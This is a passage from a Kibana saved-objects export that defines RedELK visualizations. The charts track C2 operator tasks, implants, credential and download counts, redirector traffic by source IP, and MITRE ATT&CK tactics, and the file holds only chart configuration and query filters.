"1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Tasks per C2 operator", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"histogram\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Tasks launched\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":{\"field\":\"@timestamp\",\"timeRange\":{\"from\":\"now-1d\",\"to\":\"now\"},\"useNormalizedEsInterval\":true,\"scaleMetricValues\":false,\"interval\":\"auto\",\"drop_partials\":false,\"min_doc_count\":1,\"extended_bounds\":{}}},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"group\",\"params\":{\"field\":\"user.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":10,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":true,\"missingBucketLabel\":\"Unknown user\"}}],\"params\":{\"type\":\"histogram\",\"grid\":{\"categoryLines\":false},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"filter\":true,\"truncate\":100},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Tasks launched\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Tasks launched\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"lineWidth\":2,\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"times\":[],\"addTimeMarker\":false,\"labels\":{\"show\":false},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true},\"title\":\"RedELK - Tasks launched per operator\"}"}, "coreMigrationVersion": "7.16.2", "id": "afb6ce00-d022-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "cc523820-d021-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2276], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Hosts total unique count", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"metric\",\"aggs\":[{\"id\":\"2\",\"enabled\":true,\"type\":\"cardinality\",\"schema\":\"metric\",\"params\":{\"field\":\"host.name\",\"customLabel\":\"Hosts\"}}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":60}}},\"title\":\"RedELK - Hosts total unique count\"}"}, "coreMigrationVersion": "7.16.2", "id": "b19d4790-d35f-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "68e8e870-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2278], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Downloads total count", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"metric\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Downloads\"}}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":60}}},\"title\":\"RedELK - CS - Downloads total count\"}"}, "coreMigrationVersion": "7.16.2", "id": "b5beb3c0-d04b-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "26ba4cb0-0f73-11e9-8e1e-a16db980e11e", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2280], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - HTTP Redir traffic over time", "uiStateJSON": "{}", "version": 1, "visState": "{\"title\":\"RedELK - HTTP Redir traffic over time\",\"type\":\"line\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"params\":{},\"schema\":\"metric\"},{\"id\":\"2\",\"enabled\":true,\"type\":\"filters\",\"params\":{\"filters\":[{\"input\":{\"query\":\"redir.backend.name : c2* and tags : \\\"iplist_customer\\\"\",\"language\":\"kuery\"},\"label\":\"C2 traffic - Customer\"},{\"input\":{\"query\":\"redir.backend.name : c2* and tags : \\\"iplist_redteam\\\" \",\"language\":\"kuery\"},\"label\":\"C2 traffic - Red team tests\"},{\"input\":{\"query\":\"redir.backend.name : c2* and not tags: \\\"iplist_customer\\\" and not tags : \\\"iplist_redteam\\\" \",\"language\":\"kuery\"},\"label\":\"C2 traffic - Other\"},{\"input\":{\"query\":\"not redir.backend.name : c2*\",\"language\":\"kuery\"},\"label\":\"Non-C2 traffic\"}]},\"schema\":\"group\"},{\"id\":\"3\",\"enabled\":true,\"type\":\"date_histogram\",\"params\":{\"field\":\"@timestamp\",\"timeRange\":{\"from\":\"now-1w\",\"to\":\"now\"},\"useNormalizedEsInterval\":true,\"scaleMetricValues\":false,\"interval\":\"auto\",\"drop_partials\":false,\"min_doc_count\":1,\"extended_bounds\":{}},\"schema\":\"segment\"}],\"params\":{\"type\":\"line\",\"grid\":{\"categoryLines\":false},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"filter\":true,\"truncate\":100},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Count\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"line\",\"mode\":\"normal\",\"data\":{\"label\":\"Count\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"lineWidth\":2,\"interpolate\":\"linear\",\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"times\":[],\"addTimeMarker\":false,\"labels\":{},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true,\"fittingFunction\":\"linear\"}}"}, "coreMigrationVersion": "7.16.2", "id": "be08d380-efe9-11eb-8a9f-2572da287875", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "0f7dcd70-b982-11e8-94dd-171ae5c1fd1a", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2282], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - HTTP Redir traffic source table", "uiStateJSON": "{\"vis\":{\"params\":{\"sort\":{\"columnIndex\":null,\"direction\":null}}}}", "version": 1, "visState": "{\"title\":\"RedELK - HTTP Redir traffic source table\",\"type\":\"table\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"params\":{\"customLabel\":\"Hits\"},\"schema\":\"metric\"},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"params\":{\"field\":\"source.ip\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":100,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Source IP\"},\"schema\":\"bucket\"},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"params\":{\"field\":\"source.as.organization.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":1,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":true,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"AS Organisation\"},\"schema\":\"bucket\"},{\"id\":\"4\",\"enabled\":true,\"type\":\"terms\",\"params\":{\"field\":\"source.geo.country_iso_code\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":1,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":true,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Country\"},\"schema\":\"bucket\"}],\"params\":{\"perPage\":10,\"showPartialRows\":true,\"showMetricsAtAllLevels\":false,\"sort\":{\"columnIndex\":null,\"direction\":null},\"showTotal\":true,\"totalFunc\":\"sum\",\"percentageCol\":\"Hits\",\"showToolbar\":true}}"}, "coreMigrationVersion": "7.16.2", "id": "cbb7d710-efee-11eb-8a9f-2572da287875", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "0f7dcd70-b982-11e8-94dd-171ae5c1fd1a", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2284], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Tasks execution timeframe", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"metric\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"min\",\"schema\":\"metric\",\"params\":{\"field\":\"@timestamp\",\"customLabel\":\"First task\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"max\",\"schema\":\"metric\",\"params\":{\"field\":\"@timestamp\",\"customLabel\":\"Last task\"}}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":24}}},\"title\":\"RedELK - Tasks execution timeframe\"}"}, "coreMigrationVersion": "7.16.2", "id": "ce581930-d361-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "cc523820-d021-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2286], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "title": "RedELK - Target host and user selector", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"input_control_vis\",\"aggs\":[],\"params\":{\"controls\":[{\"id\":\"1595867425052\",\"fieldName\":\"host.name\",\"parent\":\"\",\"label\":\"Target host(s)\",\"type\":\"list\",\"options\":{\"type\":\"terms\",\"multiselect\":true,\"dynamicOptions\":true,\"size\":5,\"order\":\"desc\"},\"indexPatternRefName\":\"control_0_index_pattern\"},{\"id\":\"1595867451919\",\"fieldName\":\"user.name\",\"parent\":\"\",\"label\":\"Target user(s)\",\"type\":\"list\",\"options\":{\"type\":\"terms\",\"multiselect\":true,\"dynamicOptions\":true,\"size\":5,\"order\":\"desc\"},\"indexPatternRefName\":\"control_1_index_pattern\"}],\"updateFiltersOnChange\":true,\"useTimeFilter\":false,\"pinFilters\":false},\"title\":\"RedELK - Target host and user selector\"}"}, "coreMigrationVersion": "7.16.2", "id": "d2c7b720-d026-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "rtops", "name": "control_0_index_pattern", "type": "index-pattern"}, {"id": "rtops", "name": "control_1_index_pattern", "type": "index-pattern"}], "sort": [1642152856829, 2289], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - HTTP Redir traffic per backend", "uiStateJSON": "{}", "version": 1, "visState": "{\"title\":\"RedELK - HTTP Redir traffic per backend\",\"type\":\"pie\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"params\":{},\"schema\":\"metric\"},{\"id\":\"2\",\"enabled\":true,\"type\":\"filters\",\"params\":{\"filters\":[{\"input\":{\"query\":\"redir.backend.name : c2*\",\"language\":\"kuery\"},\"label\":\"C2 traffic\"},{\"input\":{\"query\":\"not redir.backend.name : c2*\",\"language\":\"kuery\"},\"label\":\"Non-C2 traffic\"}]},\"schema\":\"segment\"},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"params\":{\"field\":\"redir.backend.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":20,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Backend\"},\"schema\":\"segment\"}],\"params\":{\"type\":\"pie\",\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"isDonut\":true,\"labels\":{\"show\":false,\"values\":true,\"last_level\":true,\"truncate\":100},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"distinctColors\":true}}"}, "coreMigrationVersion": "7.16.2", "id": "d625ba60-efe8-11eb-8a9f-2572da287875", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "0f7dcd70-b982-11e8-94dd-171ae5c1fd1a", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2291], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Credentials total count", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"metric\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Credentials\"}}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":60}}},\"title\":\"RedELK - Credentials total count\"}"}, "coreMigrationVersion": "7.16.2", "id": "dcf86190-d319-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "3fabe620-6c38-11ea-97d6-55783aed877a", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2293], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"c2.log.type: implant_newimplant\",\"language\":\"lucene\"},\"filter\":[],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "title": "RedELK - New implants over time", "uiStateJSON": "{}", "version": 1, "visState": "{\"title\":\"New implants over time\",\"type\":\"line\",\"params\":{\"type\":\"line\",\"grid\":{\"categoryLines\":true,\"style\":{\"color\":\"#eee\"},\"valueAxis\":null},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"truncate\":100,\"rotate\":0,\"filter\":true},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Amount of implants\"}}],\"seriesParams\":[{\"show\":\"true\",\"type\":\"line\",\"mode\":\"stacked\",\"data\":{\"label\":\"Amount of implants\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"showCircles\":true,\"interpolate\":\"linear\",\"lineWidth\":5,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"top\",\"times\":[],\"addTimeMarker\":false,\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true,\"fittingFunction\":\"linear\"},\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Amount of implants\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":{\"field\":\"@timestamp\",\"interval\":\"auto\",\"min_doc_count\":1,\"extended_bounds\":{}}}]}"}, "coreMigrationVersion": "7.16.2", "id": "e12434d0-b8e8-11e8-94dd-171ae5c1fd1a", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1642152856829, 2295], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"lucene\",\"query\":\"\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[]}"}, "title": "RedELK - Redirector Traffic All", "uiStateJSON": "{\"mapCenter\":[20.96143961409684,13.007096309476236],\"mapZoom\":2}", "version": 1, "visState": "{\"type\":\"tile_map\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"cardinality\",\"schema\":\"metric\",\"params\":{\"field\":\"source.ip\",\"customLabel\":\"Source IP\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"geohash_grid\",\"schema\":\"segment\",\"params\":{\"field\":\"source.geo.location\",\"autoPrecision\":true,\"precision\":2,\"useGeocentroid\":true,\"isFilteredByCollar\":true,\"customLabel\":\"\"}}],\"params\":{\"addTooltip\":true,\"colorSchema\":\"Blues\",\"heatClusterSize\":1.5,\"isDesaturated\":true,\"legendPosition\":\"bottomright\",\"mapCenter\":[0,0],\"mapType\":\"Heatmap\",\"mapZoom\":2,\"wms\":{\"baseLayersAreLoaded\":{},\"enabled\":false,\"options\":{\"format\":\"image/png\",\"transparent\":true},\"selectedTmsLayer\":{\"attribution\":\"

© OpenStreetMap contributors | Elastic Maps Service

\",\"id\":\"road_map\",\"maxZoom\":18,\"minZoom\":0,\"subdomains\":[],\"url\":\"https://tiles.maps.elastic.co/v2/default/{z}/{x}/{y}.png?elastic_tile_service_tos=agree&my_app_name=kibana&my_app_version=6.4.0&license=2f28f176-767a-4df6-a815-1f17dd8e46fc\"},\"tmsLayers\":[{\"attribution\":\"

© OpenStreetMap contributors | Elastic Maps Service

\",\"id\":\"road_map\",\"maxZoom\":18,\"minZoom\":0,\"subdomains\":[],\"url\":\"https://tiles.maps.elastic.co/v2/default/{z}/{x}/{y}.png?elastic_tile_service_tos=agree&my_app_name=kibana&my_app_version=6.4.0&license=2f28f176-767a-4df6-a815-1f17dd8e46fc\"}]}},\"title\":\"RedELK - Redirector Traffic All\"}"}, "coreMigrationVersion": "7.16.2", "id": "e97f6f10-b982-11e8-94dd-171ae5c1fd1a", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "redirtraffic", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1642152856829, 2297], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[{\"$state\":{\"store\":\"appState\"},\"meta\":{\"alias\":null,\"disabled\":false,\"key\":\"c2.log.type\",\"negate\":false,\"params\":{\"query\":\"implant_newimplant\"},\"type\":\"phrase\",\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"implant_newimplant\"}}}]}"}, "title": "RedELK - Implant per top users with computers", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"horizontal_bar\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Amount of implants\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"user.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":20,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Username\"}},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"group\",\"params\":{\"field\":\"host.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":50,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Computername\"}}],\"params\":{\"type\":\"histogram\",\"grid\":{\"categoryLines\":false,\"style\":{\"color\":\"#eee\"}},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":200},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-2\",\"name\":\"BottomAxis-1\",\"type\":\"value\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":75,\"filter\":true,\"truncate\":100},\"title\":{\"text\":\"Amount of implants\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Amount of implants\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-2\",\"drawLinesBetweenPoints\":true,\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"times\":[],\"addTimeMarker\":false,\"labels\":{},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true},\"title\":\"RedELK - Implant per top users with computers\"}"}, "coreMigrationVersion": "7.16.2", "id": "f0dcbda0-b8e5-11e8-94dd-171ae5c1fd1a", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1642152856829, 2300], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Redirector traffic alarmed IP over time", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"histogram\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Total hits\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":{\"field\":\"@timestamp\",\"timeRange\":{\"from\":\"now-30h\",\"to\":\"now\"},\"useNormalizedEsInterval\":true,\"scaleMetricValues\":false,\"interval\":\"auto\",\"drop_partials\":false,\"min_doc_count\":1,\"extended_bounds\":{}}},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"group\",\"params\":{\"field\":\"source.ip\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":10,\"otherBucket\":true,\"otherBucketLabel\":\"Other IPs\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Alarmed IPs\"}}],\"params\":{\"type\":\"histogram\",\"grid\":{\"categoryLines\":false},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"filter\":true,\"truncate\":100},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Total hits\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Total hits\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"lineWidth\":2,\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"times\":[],\"addTimeMarker\":false,\"labels\":{\"show\":false},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true},\"title\":\"RedELK - Redirector traffic alarmed IP over time\"}"}, "coreMigrationVersion": "7.16.2", "id": "f7141500-d4e1-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "658d7180-d4e1-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2302], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - MITRE ATT&CK Tactics tag cloud", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"tagcloud\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"signal.rule.threat.tactic.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":300,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}}],\"params\":{\"scale\":\"linear\",\"orientation\":\"single\",\"minFontSize\":18,\"maxFontSize\":64,\"showLabel\":false,\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"}},\"title\":\"RedELK - MITRE ATT&CK Tactics tag cloud\"}"}, "coreMigrationVersion": "7.16.2", "id": "ff3c3b80-d050-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "dddbba20-d04f-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2304], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Credentials per realm tag cloud", "uiStateJSON": "{}", "version": 1, "visState": 